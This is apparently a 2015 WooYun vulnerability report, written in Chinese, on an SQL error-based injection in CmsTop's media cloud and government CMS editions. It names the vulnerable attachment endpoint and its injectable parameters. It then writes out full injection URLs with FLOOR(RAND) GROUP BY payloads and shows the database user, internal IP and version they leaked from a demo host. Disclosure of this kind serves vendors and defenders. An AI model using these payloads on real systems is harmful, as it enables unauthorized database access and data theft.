当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0151457

漏洞标题:CmsTop媒体云&政务版SQL报错注入漏洞(XPATH)

相关厂商:CmsTop

漏洞作者: 路人甲

提交时间:2015-11-03 11:22

修复时间:2016-02-06 11:30

公开时间:2016-02-06 11:30

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-11-03: 细节已通知厂商并且等待厂商处理中
2015-11-08: 厂商主动忽略漏洞,细节向第三方安全合作伙伴开放(绿盟科技唐朝安全巡航
2016-01-02: 细节向核心白帽子及相关领域专家公开
2016-01-12: 细节向普通白帽子公开
2016-01-22: 细节向实习白帽子公开
2016-02-06: 细节向公众公开

简要描述:

RT
多个参数存在隐患
注入比较隐蔽~

详细说明:

CMSTOP比较难挖
WooYun: CMSTOP媒体云&政务版SQL报错注入漏洞(XPATH)
厂商官网:http://www.cmstop.com/
产品涉及:

CmsTop 媒体版
面向媒体提供“PC站+手机站+手机端+平板端”多终端一体化新媒体技术解决方案,助力媒体融合转型。
媒体云
CmsTop 媒体云
作为媒体云时代的开创者,思拓合众颠覆了传统的软件采购和项目外包模式,与传媒集团建立战略合作伙伴关系,以互联网思维和云计算技术为基础整合集团、区域和行业内的媒体及政务新媒体资源,共同建设和运营媒体云。
政务版
CmsTop 政务版
面向党政部门提供多终端一体化的网站群私有云技术解决方案,助力党政部门打造“两微一端”政务新媒体。


在线演示站点:

http://www.cmstop.cn/


这处SQL出在上传附件处。。。
第一步,需要注册,内部子项功能比较多

1103-SQL.png


然后就找到某子项,上传附件处,抓包
正常数据包:

1103-SQL-OK.png


注入地址:

http://site.cmstop.cn/system/attachment/thumblist?tags=&offset=0&size=35&width=250&height=100


多个参数可注入,如:tags、size、width、height
开发测试可能忽略了这一处

1103-SQL-1.png


证明其中一个参数
随便挑一个参数:width
提交:

http://site.cmstop.cn/system/attachment/thumblist?tags=&offset=0&size=35&width=250  AND (SELECT 1 FROM (SELECT COUNT(Table_name),CONCAT(user(),FLOOR(RAND(0)*2))X FROM information_schema.tables GROUP BY X)a)&height=100


1103-SQL-11.png


注出用户:

site_11701@10.162.64.228


再注一下版本:

http://site.cmstop.cn/system/attachment/thumblist?tags=&offset=0&size=35&width=250  AND (SELECT 1 FROM (SELECT COUNT(Table_name),CONCAT(version(),FLOOR(RAND(0)*2))X FROM information_schema.tables GROUP BY X)a)&height=100


1103-SQL-10.png


版本:

5.6.20-log


被前人找到漏洞以后厂商进行了相关修复,把一些配置信息改了

http://site.cmstop.cn/system/attachment/thumblist?tags=&offset=0&size=35&width=250  AND (SELECT 1 FROM (SELECT COUNT(Table_name),CONCAT(version(),FLOOR(RAND(0)*2))X FROM information_schema.tables GROUP BY X)a)&height=100


1103-SQL-13.png


数据库名被改为:

site_MDAwMDExN1zAx1

漏洞证明:

已证明

修复方案:

再过滤一次吧

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2016-02-06 11:30

厂商回复:

漏洞Rank:15 (WooYun评价)

最新状态:

暂无